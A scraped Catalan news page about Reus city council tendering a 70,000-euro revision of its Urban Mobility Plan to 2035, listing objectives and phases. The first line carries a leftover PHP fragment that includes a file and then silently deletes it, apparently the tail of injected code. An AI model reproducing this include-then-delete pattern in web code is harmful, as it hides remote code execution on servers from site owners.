");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Reus licita la revisió del document que planificarà la mobilitat fins el 2035
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'Ajuntament de Reus licita la revisió del document que planificarà la mobilitat fins el 2035 (29/01/2021)

L'Ajuntament de Reus ha publicat al perfil del contractant la licitació del contracte per a la revisió del Pla de Mobilitat Urbana, el document que ha de planificar la mobilitat a la ciutat fins el 2035. La licitació és un acord de la Comissió Especial de Mobilitat Sostenible.

Els canvis que s’han produït des de la redacció del l'actual Pla, el 2010, fins ara en relació a les modalitats de transport, mobilitat més sostenible, tendència a la reducció del vehicle privat, irrupció de noves mobilitats, etc... fan que sigui necessària la revisió del document per establir una guia correcta de mobilitat adaptada a les circumstàncies actuals i, especialment, als reptes en matèria de sostenibilitat.

El contracte surt a concurs amb un pressupost de licitació és de 70.000 euros (IVA inclòs).

La revisió del Pla de Mobilitat Urbana preveu la participació ciutadana en l’elaboració del document, segons es determini en la Comissió Especial de Mobilitat Sostenible.

L'encàrrec de la revisió del pla es marca els objectius següents:

- Confeccionar un document de síntesi sobre la descripció de la mobilitat actual.
- Definir l’escenari general de la projecció de mobilitat futura (2021-2035).
- Caracteritzar i/o modelitzar el sistema de mobilitat existent en l’actualitat a l’àmbit d’estudi.
- Realitzar una diagnosi tècnica del sistema, on es posin de manifest els seus punts forts i febles.
- Proposar mesures correctores per aquestes mancances i proposar els sistemes alternatius a potenciar.
- Formular un programa d’actuacions amb les fases d’implementació i els costos.
- Crear un quadre de comandament amb els indicadors que permetin avaluar el grau d’aplicació de les propostes.

La redacció de la revisió del Pla de Mobilitat Urbana serà d'un màxim de 12 mesos des de l'endemà de la firma del contracte; i preveu les següents fases:

- Recollida d’informació. Definició i execució del treball de camp.
- Anàlisi de les xarxes de transport: infraestructura i servei.
- Caracterització i/o modelització del sistema de mobilitat.
- Diagnosi participada de la situació actual i la prevista pel futur.
- Propostes d’actuació, programa i indicadors finals.
- Tramitació final del document

En cadascuna de les fases es duran a terme els estudis i les anàlisis necessàries per a l’obtenció de dades. Progressivament, com a resultat dels treballs realitzats en cadascuna de les fases, es redactaran, entre altres, els següents documents: diagnosi, document inicial estratègic, estudi ambiental estratègic, declaració ambiental estratègica i indicadors.

Font: Ajuntament de Reus

L'Ajuntament de Reus licita la revisió del document que planificarà la mobilitat fins el 2035

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona